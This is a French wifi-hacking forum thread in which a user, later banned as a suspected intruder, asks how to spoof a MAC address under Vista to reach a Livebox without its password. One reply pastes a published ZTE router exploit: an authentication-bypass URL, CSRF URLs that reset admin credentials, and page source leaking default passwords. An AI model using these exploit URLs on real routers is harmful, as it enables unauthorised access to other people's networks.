Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-11-2011 18:44:37

Alexandra78
Banni(e)

Impossibilité de changer mon adresse MAC sous Vista!

Bonjour à tous!

Voilà, j'ai un semi gros problème :

Normalement je suis pas trop une bille en informatique, mais voilà, j'ai réussi via la suite backtrack à faire ce qu'il fallait.

Quand il s'agit de changer mon adresse mac, soit avec la commande macchanger ou ifconfig wlan0 hw ether 00:FF(etc), pas de soucis, cela fonctionne, et je suis la reine du monde.

Mais lorsque je reboot (sans passer par le live USB ubuntu) sous vista...

Impossible de changer mon adresse MAC!!!

Soit via macshift, soit via clic droit >propriété> avancé>adresse mac (de ma carte wifi), soit même en passant par le registre et en changeant manuellement la valeur de la clef pour l'adresse mac de ce périphérique wifi...
même en utilisant des logs exprès genre anonymac....
Lorsque je tape sous cmd  "ipconfig /all", jamais il ne me virtualise avec la bonne MAC, il garde toujours celle d'origine...

Alors impossible de me connecter à cette foutue livebox.

Et lorsque je suis sous ubuntu, j'ai testé d'aller sur 192.168.1.1, mais admin et mdp admin ne me loggent pas sur la box, je ne me rappelle/trouve plus les identifiants!
J'aurais bien rajouté mon adresse MAC physique dans celles autorisées dedans, histoire de ne plus en entendre parler une fois pour toutes, mais no fakin way, i can't.

Quelqu'un aurait quelques conseils?
(à part m'acheter une wifi usb, reformater mon DD et faire une autre partition et migrer sous linux... lol).

Neep help, pleaaase!

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-11-2011 19:10:23

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : Impossibilité de changer mon adresse MAC sous Vista!

Bonjour, en fouinant un peu sur Google tu devrais trouver une myriade de tools pour changer d'adresse mac sous Windows. Je ne vais pas t'en mettre en lien car en général c'est assez capricieux. Dès fois ça fonctionne dès fois non (souvent non). Tu as quand même partiellement trouvé ta réponse smile.

(à part m'acheter une wifi usb, reformater mon DD et faire une autre partition et migrer sous linux... lol).

Sinon ce que je ferais à ta place, qui est quand même beaucoup plus simple, c'est un reset de la live box. Tu re paramètre le tout en notant bien ton mdp wink et le tour est joué.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#3 21-11-2011 19:14:47

koala
Membre d'honneur
Lieu : In the sky

Normalement je suis pas trop une bille en informatique, mais voilà, j'ai réussi via la suite backtrack à faire ce qu'il fallait.

Si tu as un problème d'adresse MAC il te suffit juste de te connecter en filaire pour désactiver le filtrage ou autoriser l'adresse en question.Sinon comme le suggère noireaude un reset pour récup les ID par default wink

#4 21-11-2011 19:17:00

Alexandra78
Banni(e)

Merci beaucoup pour cette rapide réponse smile

C'est gentil de me rappeller que Gougueule est mon ami, néanmoins j'ai déjà utilisé plusieurs soft différents pour changer mon adresse mac, soit anonymac, macshift, et même via le registre quand même!
Ca aurait dû suffire quoi, même après avoir rebooté pas mal de fois (et de trucs...)

Pour ce qui est de la livebox j'aurais vraiment, vraiment voulu me passer de la rebooter physiquement, vu les périphériques déjà attribués dessus, ça prendrait pas mal de temps...

Non, vraiment, j'aurais voulu trouver une façon détournée de déjouer cela.

Chépa, faire ce genre de modif sous ms-dos ou un truc du genre, et que ça le change après à chaque démarrage!

En plus, techniquement ça ne viens pas de l'impossibilité physique (ou soft) de ma carte de changer, puisque elle y parvient sous ubuntu!...

Que faire....! que faire...

Ca commence à m'ennuyer de devoir tout reparamétrer à chaque fois que je veux me connecter de cette façon...

#5 21-11-2011 19:46:01

noireaude
Membre d'honneur
Site Web

Alexandra78 a écrit :

Merci beaucoup pour cette rapide réponse smile

C'est gentil de me rappeller que Gougueule est mon ami, néanmoins j'ai déjà utilisé plusieurs soft différents pour changer mon adresse mac, soit anonymac, macshift, et même via le registre quand même!

Je ne voulais pas te dire d'aller su Google de façon péjorative hein. C'est juste que comme je te le disai et comme tu l'as remarqué, la majorité des tools que tu trouveras dessus sont foireux (enfin c'est Windows qui est en cause plus que les tools sur ce coup la).

Comme l'a suggéré le plantigrade le câble. Pour ma part ça serait le reset, je me vois mal dans tous les cas utiliser ma box sans en connaître le MDP.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 21-11-2011 20:03:40

koala
Membre d'honneur

Comme l'a suggéré le plantigrade le câble. Pour ma part ça serait le reset, je me vois mal dans tous les cas utiliser ma box sans en connaître le MDP.

Si, en la hackant d'abord big_smile c'est quoi que tu as comme livebox? Sur les ZTE il y a un exploit sorti assez récement:

1 - Authentication bypass + Cross Site Request forgery
To bypass authentication go to URL : http://192.168.1.1/accessaccount.cgi
To get request forgery; The attacker can request from his browser without cookie or any authentication, or send link to the Administrator :

USER ACCOUNT : http://192.168.1.1/accessaccount.cgi?usrUserName=user&usrPassword=111111
ADMIN ACCOUNT : http://192.168.1.1/accessaccount.cgi?sysUserName=admin&sysPassword=111111

2 - Script revealing sensitive information on source of page "accessaccount.cgi":

function frmLoad()
{
   with ( document.forms.adminaccount ) {
      sysUserName.value = 'admin';
      sysPassword.value = '43210';
      syscfmPwd.value = '43210';

usrUserName.value = 'user';
      usrPassword.value = '111111';
      usrcfmPwd.value = '111111';
   }
}

Sources Exploit 1337 base

#7 21-11-2011 22:19:51

antares145
Membre d'honneur
Site Web

Seven, quelle version ? 64 bits ?

On en a déjà parlé plusieurs fois sur le forum, il me semble sue le seul prog' qui donnait des résultats à peu près corrects c'était Mac Makeup --> mayday... changer l'adresse mac de ma alfa 1000 AWUS036H sous seven

Au passage, je vois peut-être le mal partout mais je trouve ça un peu louche... C'est ton réseau, mais comme par hasard ton adresse n'est pas acceptée, comme par hasard tu as oublié le mot de passe et comme par hasard tu ne veux pas réinitialiser la box... Je trouve que ça fait beaucoup de hasards en une fois roll

#8 22-11-2011 00:02:42

noireaude
Membre d'honneur
Site Web

antares145 a écrit :

Au passage, je vois peut-être le mal partout mais je trouve ça un peu louche... C'est ton réseau, mais comme par hasard ton adresse n'est pas acceptée, comme par hasard tu as oublié le mot de passe et comme par hasard tu ne veux pas réinitialiser la box... Je trouve que ça fait beaucoup de hasards en une fois roll

Le coup du reset est en général un bon signe, la question n'était pas innocente. Perso je trouve ça un peu louche aussi ...

#9 22-11-2011 00:16:17

koala
Membre d'honneur

Antares a éclairé notre naiveté wink ça fait beaucoup de hasard effectivement, ça ressemble a du "hack déguisé" il a pas accès a la box tentes de spoofer une adresse sous vista mais ça marche pas, il revient sous linux spoof la bonne adresse et tentes d'accéder a l'interface ou le couple Id/mdp a changé.

On est trop bon des fois, et toi je crois que tu n'as pas compris le but de ce forum cher ami, lock ban.

#10 22-11-2011 00:46:06

noireaude
Membre d'honneur
Site Web

Perso j'étais pas naif, juste dans le doute :s

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]